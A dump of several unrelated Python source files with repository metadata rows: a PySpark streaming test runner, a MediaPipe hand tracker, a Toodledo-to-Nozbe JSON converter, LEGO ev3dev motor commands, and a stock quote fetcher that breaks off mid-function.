glob.glob(os.path.join(dir, "target/" + name_prefix + "_*.jar")))
return [jar for jar in jars if not jar.endswith(ignored_jar_suffixes)]
def search_kafka_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
kafka_assembly_dir = os.path.join(SPARK_HOME, "external/kafka-assembly")
jars = search_jar(kafka_assembly_dir, "spark-streaming-kafka-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming kafka assembly jar in %s. " % kafka_assembly_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-kafka-assembly/assembly' or "
"'build/mvn package' before running this test.")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Kafka assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_flume_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
flume_assembly_dir = os.path.join(SPARK_HOME, "external/flume-assembly")
jars = search_jar(flume_assembly_dir, "spark-streaming-flume-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming Flume assembly jar in %s. " % flume_assembly_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-flume-assembly/assembly' or "
"'build/mvn package' before running this test.")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Flume assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_mqtt_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
mqtt_assembly_dir = os.path.join(SPARK_HOME, "external/mqtt-assembly")
jars = search_jar(mqtt_assembly_dir, "spark-streaming-mqtt-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming MQTT assembly jar in %s. " % mqtt_assembly_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-mqtt-assembly/assembly' or "
"'build/mvn package' before running this test")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming MQTT assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_mqtt_test_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
mqtt_test_dir = os.path.join(SPARK_HOME, "external/mqtt")
jars = glob.glob(
os.path.join(mqtt_test_dir, "target/scala-*/spark-streaming-mqtt-test-*.jar"))
if not jars:
raise Exception(
("Failed to find Spark Streaming MQTT test jar in %s. " % mqtt_test_dir) +
"You need to build Spark with "
"'build/sbt assembly/assembly streaming-mqtt/test:assembly'")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming MQTT test JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_kinesis_asl_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
kinesis_asl_assembly_dir = os.path.join(SPARK_HOME, "extras/kinesis-asl-assembly")
jars = search_jar(kinesis_asl_assembly_dir, "spark-streaming-kinesis-asl-assembly")
if not jars:
return None
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Kinesis ASL assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
kinesis_test_environ_var = "ENABLE_KINESIS_TESTS"
are_kinesis_tests_enabled = os.environ.get(kinesis_test_environ_var) == '1'
if __name__ == "__main__":
kafka_assembly_jar = search_kafka_assembly_jar()
flume_assembly_jar = search_flume_assembly_jar()
mqtt_assembly_jar = search_mqtt_assembly_jar()
mqtt_test_jar = search_mqtt_test_jar()
kinesis_asl_assembly_jar = search_kinesis_asl_assembly_jar()
if kinesis_asl_assembly_jar is None:
kinesis_jar_present = False
jars = "%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
mqtt_test_jar)
else:
kinesis_jar_present = True
jars = "%s,%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
mqtt_test_jar, kinesis_asl_assembly_jar)
os.environ["PYSPARK_SUBMIT_ARGS"] = "--jars %s pyspark-shell" % jars
testcases = [BasicOperationTests, WindowFunctionTests, StreamingContextTests, CheckpointTests,
KafkaStreamTests, FlumeStreamTests, FlumePollingStreamTests, MQTTStreamTests]
if kinesis_jar_present is True:
testcases.append(KinesisStreamTests)
elif are_kinesis_tests_enabled is False:
sys.stderr.write("Skipping all Kinesis Python tests as the optional Kinesis project was "
"not compiled into a JAR. To run these tests, "
"you need to build Spark with 'build/sbt -Pkinesis-asl assembly/assembly "
"streaming-kinesis-asl-assembly/assembly' or "
"'build/mvn -Pkinesis-asl package' before running this test.")
else:
raise Exception(
("Failed to find Spark Streaming Kinesis assembly jar in %s. "
% kinesis_asl_assembly_dir) +
"You need to build Spark with 'build/sbt -Pkinesis-asl "
"assembly/assembly streaming-kinesis-asl-assembly/assembly'"
"or 'build/mvn -Pkinesis-asl package' before running this test.")
sys.stderr.write("Running tests: %s \n" % (str(testcases)))
for testcase in testcases:
sys.stderr.write("[Running %s]\n" % (testcase))
tests = unittest.TestLoader().loadTestsFromTestCase(testcase)
if xmlrunner:
unittest.main(tests, verbosity=3,
testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.TextTestRunner(verbosity=3).run(tests)
| true | true |
f7fa483194a4be04920b80ded13583a783e3c37f | 2,163 | py | Python | Python/HandTracking/HandTracking_module.py | vermayash7980/Hacktoberfest2021 | 66e190608c5e3f9ad983ba8f707e499ca5bc6da0 | [
"MIT"
] | 39 | 2021-10-03T05:40:26.000Z | 2021-10-31T18:09:23.000Z | Python/HandTracking/HandTracking_module.py | vermayash7980/Hacktoberfest2021 | 66e190608c5e3f9ad983ba8f707e499ca5bc6da0 | [
"MIT"
] | 26 | 2021-10-03T04:50:47.000Z | 2021-10-16T07:39:22.000Z | Python/HandTracking/HandTracking_module.py | vermayash7980/Hacktoberfest2021 | 66e190608c5e3f9ad983ba8f707e499ca5bc6da0 | [
"MIT"
] | 215 | 2021-10-03T04:35:47.000Z | 2021-10-31T17:37:42.000Z | import cv2
import mediapipe as mp
import time
class HandDetector():
def __init__(self, mode = False, maxHands = 2, detectionCon = 0.5, trackCon = 0.5):
self.mode = mode
self.maxHands = maxHands
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.mode, self.maxHands, self.detectionCon, self.trackCon)
self.mpDraw = mp.solutions.drawing_utils
def findHands(self, img, draw = True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
# print(results.multi_hand_landmarks)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def findPosition(self, img, handNo = 0, draw = True):
lmList = []
if self.results.multi_hand_landmarks:
myHand = self.results.multi_hand_landmarks[handNo]
for id, lm in enumerate(myHand.landmark):
# print(id, lm)
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
# print(id, cx, cy)
lmList.append([id, cx, cy])
if draw:
# if id == 12:
cv2.circle(img, (cx, cy), 10, (255, 0, 255), cv2.FILLED)
return lmList
def main():
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0)
detector = HandDetector()
while True:
success, img = cap.read()
img = detector.findHands(img)
lmList = detector.findPosition(img)
if len(lmList) != 0:
print(lmList[1])
cTime = time.time()
fps = 1 / (cTime - pTime)
pTime = cTime
cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3, (255, 0, 255), 3)
cv2.imshow("Image", img)
cv2.waitKey(1)
if __name__ == "__main__":
main()
| 30.9 | 100 | 0.548775 | import cv2
import mediapipe as mp
import time
class HandDetector():
def __init__(self, mode = False, maxHands = 2, detectionCon = 0.5, trackCon = 0.5):
self.mode = mode
self.maxHands = maxHands
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.mode, self.maxHands, self.detectionCon, self.trackCon)
self.mpDraw = mp.solutions.drawing_utils
def findHands(self, img, draw = True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def findPosition(self, img, handNo = 0, draw = True):
lmList = []
if self.results.multi_hand_landmarks:
myHand = self.results.multi_hand_landmarks[handNo]
for id, lm in enumerate(myHand.landmark):
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
lmList.append([id, cx, cy])
if draw:
cv2.circle(img, (cx, cy), 10, (255, 0, 255), cv2.FILLED)
return lmList
def main():
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0)
detector = HandDetector()
while True:
success, img = cap.read()
img = detector.findHands(img)
lmList = detector.findPosition(img)
if len(lmList) != 0:
print(lmList[1])
cTime = time.time()
fps = 1 / (cTime - pTime)
pTime = cTime
cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3, (255, 0, 255), 3)
cv2.imshow("Image", img)
cv2.waitKey(1)
if __name__ == "__main__":
main()
| true | true |
f7fa4c08ec747242c9254c959ee137fb898db039 | 5,601 | py | Python | toodledo2nozbe.py | dodiggitydag/Toodledo-To-Nozbe | 5185e1fd1e8e8d0b8d876b1dff8837d04ee1dd01 | [
"CC0-1.0"
] | null | null | null | toodledo2nozbe.py | dodiggitydag/Toodledo-To-Nozbe | 5185e1fd1e8e8d0b8d876b1dff8837d04ee1dd01 | [
"CC0-1.0"
] | null | null | null | toodledo2nozbe.py | dodiggitydag/Toodledo-To-Nozbe | 5185e1fd1e8e8d0b8d876b1dff8837d04ee1dd01 | [
"CC0-1.0"
] | null | null | null | """
Python script to convert Toodledo to Wunderlist backup json file format for
importing into Nozbe.
It is unable to retain the following fields: repeating tasks, timer values,
complex due dates, due times, lengths, locations, goals, statuses, start dates
and times.
Example: python toodledo2nozbe.py toodledo.xml forNozbe.json
Requirements: Python and BeautifulSoup4
Install BeautifulSoup4 using command: pip install BeautifulSoup4
"""
import argparse
import json
from bs4 import BeautifulSoup
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__, usage='python toodledo2nozbe.py src_xml_file out_file')
parser.add_argument('src_xml_file')
parser.add_argument('out_file')
args = parser.parse_args()
with open(args.src_xml_file, 'r') as myfile:
data = myfile.read().replace('\n', '')
soup = BeautifulSoup(data, 'html.parser')
data = {}
data['data'] = {'lists': [], 'tasks': [], 'subtasks': [], 'notes': [], 'task_positions': [], 'subtask_positions': []}
# Build list of Toodledo Folders which will become Wunderlist lists then Nozbe Projects
# this first loop is to remove duplicates
x = []
for item in soup.findAll('folder'):
if item.text not in x:
x.append(item.text)
## Now add them as lists to the json output data
i = 0
listIds = {}
for folder_name in x:
i = i + 1
data['data']['lists'].append({"id": i, "title": folder_name, "list_type": "list"})
listIds[folder_name] = i
dictUnsupportedFields = {}
dictUnsupportedFields['repeating tasks'] = 0
dictUnsupportedFields['timer values'] = 0
dictUnsupportedFields['complex due dates'] = 0
dictUnsupportedFields['due times'] = 0
dictUnsupportedFields['lengths'] = 0
dictUnsupportedFields['locations'] = 0
dictUnsupportedFields['goals'] = 0
dictUnsupportedFields['statuses'] = 0
dictUnsupportedFields['start dates and times'] = 0
dictNotes = {}
i = 0
for item in soup.findAll('item'):
i = i + 1
t_id = item.id.text
t_title = item.title.text
t_folder = item.folder.text
t_duedate = item.duedate.text
t_completed = item.completed.text
t_star = item.star.text
t_note = item.note.text
# I need these, for now I've put them in the title
t_order = item.order.text
t_parent = item.parent.text
t_priority = item.priority.text
t_context = item.context.text
t_tag = item.tag.text
# not converted into target file
t_duedatemodifier = item.duedatemodifier.text
t_duetime = item.duetime.text
t_goal = item.goal.text
t_length = item.length.text
t_location = item.location.text
t_repeat = item.repeat.text
t_repeatfrom = item.repeatfrom.text
t_startdate = item.startdate.text
t_starttime = item.starttime.text
t_status = item.status.text
t_timer = item.timer.text
if t_repeat != 'None':
dictUnsupportedFields['repeating tasks'] = dictUnsupportedFields['repeating tasks'] + 1
if t_timer != '0':
dictUnsupportedFields['timer values'] = dictUnsupportedFields['timer values'] + 1
if t_duedatemodifier != '0':
dictUnsupportedFields['complex due dates'] = dictUnsupportedFields['complex due dates'] + 1
if t_duetime != '':
dictUnsupportedFields['due times'] = dictUnsupportedFields['due times'] + 1
if t_length != '':
dictUnsupportedFields['lengths'] = dictUnsupportedFields['lengths'] + 1
if t_location != '':
dictUnsupportedFields['locations'] = dictUnsupportedFields['locations'] + 1
if t_goal != '':
dictUnsupportedFields['goals'] = dictUnsupportedFields['goals'] + 1
if t_status != 'None':
dictUnsupportedFields['statuses'] = dictUnsupportedFields['statuses'] + 1
if t_startdate != "0000-00-00" or t_starttime != '':
dictUnsupportedFields['start dates and times'] = dictUnsupportedFields['start dates and times'] + 1
val_starred = False
if t_star == "1":
val_starred = True
val_complete = False
val_completedAt = ''
if t_completed != "0000-00-00":
val_complete = True
val_completedAt = t_completed + 'T08:00:00.000Z'
if t_note != '':
dictNotes[t_id] = t_note
# Build a composite title
v_title = t_title
if t_context != '':
v_title = "%s %s" % (v_title, t_context)
if t_priority != '':
v_title = "-%s %s" % (t_priority, v_title)
if t_status != 'None':
v_title = "-%s %s" % (t_status, v_title)
if t_tag != '':
v_title = "%s %s" % (v_title, t_tag)
data['data']['tasks'].append({"id": t_id, "completed": val_complete, "completed_at": val_completedAt, "starred": val_starred, "title": v_title, "list_id": listIds[t_folder]})
# Add notes to the json data
for taskID in dictNotes.keys():
data['data']['notes'].append({"task_id": taskID, "content": dictNotes[taskID]})
# Warn the user of unsupported fields
for unsupported_field in dictUnsupportedFields.keys():
i = dictUnsupportedFields[unsupported_field]
if i > 0:
print('WARNING: %s are not supported (%d occurences).' % (unsupported_field, i))
# Dump the file
with open(args.out_file, 'w') as outfile:
json.dump(data, outfile)
print('Done.')
| 36.848684 | 182 | 0.628102 | import argparse
import json
from bs4 import BeautifulSoup
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__, usage='python toodledo2nozbe.py src_xml_file out_file')
parser.add_argument('src_xml_file')
parser.add_argument('out_file')
args = parser.parse_args()
with open(args.src_xml_file, 'r') as myfile:
data = myfile.read().replace('\n', '')
soup = BeautifulSoup(data, 'html.parser')
data = {}
data['data'] = {'lists': [], 'tasks': [], 'subtasks': [], 'notes': [], 'task_positions': [], 'subtask_positions': []}
x = []
for item in soup.findAll('folder'):
if item.text not in x:
x.append(item.text)
in x:
i = i + 1
data['data']['lists'].append({"id": i, "title": folder_name, "list_type": "list"})
listIds[folder_name] = i
dictUnsupportedFields = {}
dictUnsupportedFields['repeating tasks'] = 0
dictUnsupportedFields['timer values'] = 0
dictUnsupportedFields['complex due dates'] = 0
dictUnsupportedFields['due times'] = 0
dictUnsupportedFields['lengths'] = 0
dictUnsupportedFields['locations'] = 0
dictUnsupportedFields['goals'] = 0
dictUnsupportedFields['statuses'] = 0
dictUnsupportedFields['start dates and times'] = 0
dictNotes = {}
i = 0
for item in soup.findAll('item'):
i = i + 1
t_id = item.id.text
t_title = item.title.text
t_folder = item.folder.text
t_duedate = item.duedate.text
t_completed = item.completed.text
t_star = item.star.text
t_note = item.note.text
t_order = item.order.text
t_parent = item.parent.text
t_priority = item.priority.text
t_context = item.context.text
t_tag = item.tag.text
# not converted into target file
t_duedatemodifier = item.duedatemodifier.text
t_duetime = item.duetime.text
t_goal = item.goal.text
t_length = item.length.text
t_location = item.location.text
t_repeat = item.repeat.text
t_repeatfrom = item.repeatfrom.text
t_startdate = item.startdate.text
t_starttime = item.starttime.text
t_status = item.status.text
t_timer = item.timer.text
if t_repeat != 'None':
dictUnsupportedFields['repeating tasks'] = dictUnsupportedFields['repeating tasks'] + 1
if t_timer != '0':
dictUnsupportedFields['timer values'] = dictUnsupportedFields['timer values'] + 1
if t_duedatemodifier != '0':
dictUnsupportedFields['complex due dates'] = dictUnsupportedFields['complex due dates'] + 1
if t_duetime != '':
dictUnsupportedFields['due times'] = dictUnsupportedFields['due times'] + 1
if t_length != '':
dictUnsupportedFields['lengths'] = dictUnsupportedFields['lengths'] + 1
if t_location != '':
dictUnsupportedFields['locations'] = dictUnsupportedFields['locations'] + 1
if t_goal != '':
dictUnsupportedFields['goals'] = dictUnsupportedFields['goals'] + 1
if t_status != 'None':
dictUnsupportedFields['statuses'] = dictUnsupportedFields['statuses'] + 1
if t_startdate != "0000-00-00" or t_starttime != '':
dictUnsupportedFields['start dates and times'] = dictUnsupportedFields['start dates and times'] + 1
val_starred = False
if t_star == "1":
val_starred = True
val_complete = False
val_completedAt = ''
if t_completed != "0000-00-00":
val_complete = True
val_completedAt = t_completed + 'T08:00:00.000Z'
if t_note != '':
dictNotes[t_id] = t_note
# Build a composite title
v_title = t_title
if t_context != '':
v_title = "%s %s" % (v_title, t_context)
if t_priority != '':
v_title = "-%s %s" % (t_priority, v_title)
if t_status != 'None':
v_title = "-%s %s" % (t_status, v_title)
if t_tag != '':
v_title = "%s %s" % (v_title, t_tag)
data['data']['tasks'].append({"id": t_id, "completed": val_complete, "completed_at": val_completedAt, "starred": val_starred, "title": v_title, "list_id": listIds[t_folder]})
# Add notes to the json data
for taskID in dictNotes.keys():
data['data']['notes'].append({"task_id": taskID, "content": dictNotes[taskID]})
# Warn the user of unsupported fields
for unsupported_field in dictUnsupportedFields.keys():
i = dictUnsupportedFields[unsupported_field]
if i > 0:
print('WARNING: %s are not supported (%d occurences).' % (unsupported_field, i))
# Dump the file
with open(args.out_file, 'w') as outfile:
json.dump(data, outfile)
print('Done.')
| true | true |
f7fa4c71261b9e280dda72cc0e1fb465dab19360 | 1,974 | py | Python | R_ev3dev/motor/motor.py | thomasvolk/R_ev3dev | 53b8c83af49e88eb4766deea0a690c55d1304d6a | [
"Apache-2.0"
] | null | null | null | R_ev3dev/motor/motor.py | thomasvolk/R_ev3dev | 53b8c83af49e88eb4766deea0a690c55d1304d6a | [
"Apache-2.0"
] | null | null | null | R_ev3dev/motor/motor.py | thomasvolk/R_ev3dev | 53b8c83af49e88eb4766deea0a690c55d1304d6a | [
"Apache-2.0"
] | null | null | null | from R_ev3dev.peripheral import BackgroundPeripheralCommand, PeripheralAction
from R_ev3dev.interpreter import Command
from R_ev3dev.ev3 import ev3dev2
class ListMotors(Command):
""" list all motors """
def invoke(self, interpreter_context, args):
return [{'driver_name': m.driver_name, 'address': m.address} for m in ev3dev2.motor.list_motors()]
class On(PeripheralAction):
def __init__(self, motor_type_factory):
self.__motor_type_factory = motor_type_factory
super().__init__("on")
def invoke(self, context, args):
out = args[0]
motor = self.__motor_type_factory(out)
context["motor"] = motor
return motor
class OnForRotations(PeripheralAction):
def __init__(self):
super().__init__("on_for_rotations")
def invoke(self, context, args):
speed = int(args[0])
rotations = float(args[1])
return context["motor"].on_for_rotations(
ev3dev2.motor.SpeedPercent(speed),
rotations
)
class Motor(BackgroundPeripheralCommand):
def __init__(self, name, motor_type_factory):
super().__init__(name, [
On(motor_type_factory),
self.with_background_proxy(OnForRotations())
])
class LargeMotor(Motor):
""" controls a large motor
large_motor <id> on <out>
large_motor <id> on_for_rotations <speed_percent> <rotations>
large_motor <id> run_in_background true|false
"""
def __init__(self, name):
super().__init__(name, lambda out: ev3dev2.motor.LargeMotor(out))
class MediumMotor(Motor):
""" controls a medium motor
medium_motor <id> on <out>
medium_motor <id> on_for_rotations <speed_percent> <rotations>
medium_motor <id> run_in_background true|false
"""
def __init__(self, name):
super().__init__(name, lambda out: ev3dev2.motor.MediumMotor(out))
| 29.462687 | 106 | 0.648936 | from R_ev3dev.peripheral import BackgroundPeripheralCommand, PeripheralAction
from R_ev3dev.interpreter import Command
from R_ev3dev.ev3 import ev3dev2
class ListMotors(Command):
def invoke(self, interpreter_context, args):
return [{'driver_name': m.driver_name, 'address': m.address} for m in ev3dev2.motor.list_motors()]
class On(PeripheralAction):
def __init__(self, motor_type_factory):
self.__motor_type_factory = motor_type_factory
super().__init__("on")
def invoke(self, context, args):
out = args[0]
motor = self.__motor_type_factory(out)
context["motor"] = motor
return motor
class OnForRotations(PeripheralAction):
def __init__(self):
super().__init__("on_for_rotations")
def invoke(self, context, args):
speed = int(args[0])
rotations = float(args[1])
return context["motor"].on_for_rotations(
ev3dev2.motor.SpeedPercent(speed),
rotations
)
class Motor(BackgroundPeripheralCommand):
def __init__(self, name, motor_type_factory):
super().__init__(name, [
On(motor_type_factory),
self.with_background_proxy(OnForRotations())
])
class LargeMotor(Motor):
def __init__(self, name):
super().__init__(name, lambda out: ev3dev2.motor.LargeMotor(out))
class MediumMotor(Motor):
def __init__(self, name):
super().__init__(name, lambda out: ev3dev2.motor.MediumMotor(out))
| true | true |
f7fa4e63aaa6eb69cc2d8bd5c00905d7a5668834 | 6,606 | py | Python | friartuck/quote_source.py | codesociety/friartuck | 450adae920ac64a4d3bca5258512295d3eaecea5 | [
"MIT"
] | 157 | 2017-10-18T04:46:50.000Z | 2021-12-15T04:30:47.000Z | friartuck/quote_source.py | codesociety/friartuck | 450adae920ac64a4d3bca5258512295d3eaecea5 | [
"MIT"
] | 13 | 2017-11-04T21:29:05.000Z | 2019-09-18T14:53:31.000Z | friartuck/quote_source.py | codesociety/friartuck | 450adae920ac64a4d3bca5258512295d3eaecea5 | [
"MIT"
] | 32 | 2017-12-04T21:53:22.000Z | 2020-06-21T15:51:41.000Z | """
MIT License
Copyright (c) 2017 Code Society
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import time
import urllib.request
from abc import abstractmethod
from datetime import datetime
import pandas as pd
import numpy as np
from friartuck.iextrading import iextrading
from friartuck.alphavantage import alphavantage
log = logging.getLogger("friar_tuck")
class QuoteSourceAbstract:
@abstractmethod
def fetch_quotes(self, symbol, bar_count=10, frequency='1m'):
pass
def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
pass
class FriarTuckQuoteSource(QuoteSourceAbstract):
allowed_history_frequency = {'1m': 1, '5m': 5, '15m': 15, '1h': 60, '1d': 1}
def __init__(self, config):
self.config = config
self.alpha = alphavantage.AlphaVantage(config.get('ALPHA_VANTAGE', 'apikey'))
self.iex = iextrading.IEXTrading()
def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
if frequency not in ['1m', '5m', '15m', '1h']:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
interval = "%smin" % self.allowed_history_frequency[frequency]
if isinstance(symbol, str):
bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = 0
log.info("connected:%s" % bars.iloc[0]['connected'])
while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected']:
log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
if ctr >= 7:
break
time.sleep(10)
bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = ctr+1
if field:
bars = bars[field]
return bars
symbol_bars = {}
for sym in symbol:
bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = 0
log.info("connected:%s" % bars.iloc[0]['connected'])
while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected'] and 'yes' == self.config.get('ALPHA_VANTAGE', 'wait_for_connection'):
log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
if ctr >= 7:
break
time.sleep(10)
bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = ctr+1
if field:
bars = bars[field]
symbol_bars[sym] = bars
return symbol_bars
def fetch_quotes(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
# market_open = True
if frequency not in self.allowed_history_frequency:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
if isinstance(symbol, str):
return self._fetch_quotes_by_sym(symbol=symbol, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
symbol_bars = {}
for sym in symbol:
symbol_bars[sym] = self._fetch_quotes_by_sym(symbol=sym, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
return symbol_bars
def _fetch_quotes_by_sym(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
if frequency not in self.allowed_history_frequency:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
if not isinstance(symbol, str):
log.warning("only for str symbol (%s)" % symbol)
return None
if frequency in ['1m', '5m', '15m', '1h']:
bars = None
before_date = None
if market_open:
bars = self.fetch_intraday_quotes(symbol=symbol, frequency=frequency, field=None, since_last_quote_time=since_last_quote_time)
# log.info("intra_bars:"+len(bars))
if len(bars) > 0 and not np.isnan(float(bars.iloc[0]['close'])):
before_date = bars.iloc[-1]['date']
if len(bars) > 0 and np.isnan(float(bars.iloc[0]['close'])):
bars = bars.drop([bars.index[0]])
# log.info(bars)
if bars is None or len(bars) < bar_count:
new_bars = self.iex.get_quote_intraday_hist_by_bars(symbol=symbol, minute_series=self.allowed_history_frequency[frequency], bars=bar_count, before_date=before_date)
if bars is None:
bars = new_bars
else:
bars = new_bars.append(bars)
bars.sort_index(inplace=True)
if field:
bars = bars[field]
return bars
bars = self.iex.get_quote_daily(symbol=symbol, bars=bar_count)
if field:
bars = bars[field]
return bars
| 42.619355 | 193 | 0.653497 |
import logging
import time
import urllib.request
from abc import abstractmethod
from datetime import datetime
import pandas as pd
import numpy as np
from friartuck.iextrading import iextrading
from friartuck.alphavantage import alphavantage
log = logging.getLogger("friar_tuck")
class QuoteSourceAbstract:
@abstractmethod
def fetch_quotes(self, symbol, bar_count=10, frequency='1m'):
pass
def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
pass
class FriarTuckQuoteSource(QuoteSourceAbstract):
allowed_history_frequency = {'1m': 1, '5m': 5, '15m': 15, '1h': 60, '1d': 1}
def __init__(self, config):
self.config = config
self.alpha = alphavantage.AlphaVantage(config.get('ALPHA_VANTAGE', 'apikey'))
self.iex = iextrading.IEXTrading()
def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
if frequency not in ['1m', '5m', '15m', '1h']:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
interval = "%smin" % self.allowed_history_frequency[frequency]
if isinstance(symbol, str):
bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = 0
log.info("connected:%s" % bars.iloc[0]['connected'])
while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected']:
log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
if ctr >= 7:
break
time.sleep(10)
bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = ctr+1
if field:
bars = bars[field]
return bars
symbol_bars = {}
for sym in symbol:
bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = 0
log.info("connected:%s" % bars.iloc[0]['connected'])
while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected'] and 'yes' == self.config.get('ALPHA_VANTAGE', 'wait_for_connection'):
log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
if ctr >= 7:
break
time.sleep(10)
bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = ctr+1
if field:
bars = bars[field]
symbol_bars[sym] = bars
return symbol_bars
def fetch_quotes(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
if frequency not in self.allowed_history_frequency:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
if isinstance(symbol, str):
return self._fetch_quotes_by_sym(symbol=symbol, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
symbol_bars = {}
for sym in symbol:
symbol_bars[sym] = self._fetch_quotes_by_sym(symbol=sym, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
return symbol_bars
def _fetch_quotes_by_sym(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
if frequency not in self.allowed_history_frequency:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
if not isinstance(symbol, str):
log.warning("only for str symbol (%s)" % symbol)
return None
if frequency in ['1m', '5m', '15m', '1h']:
bars = None
before_date = None
if market_open:
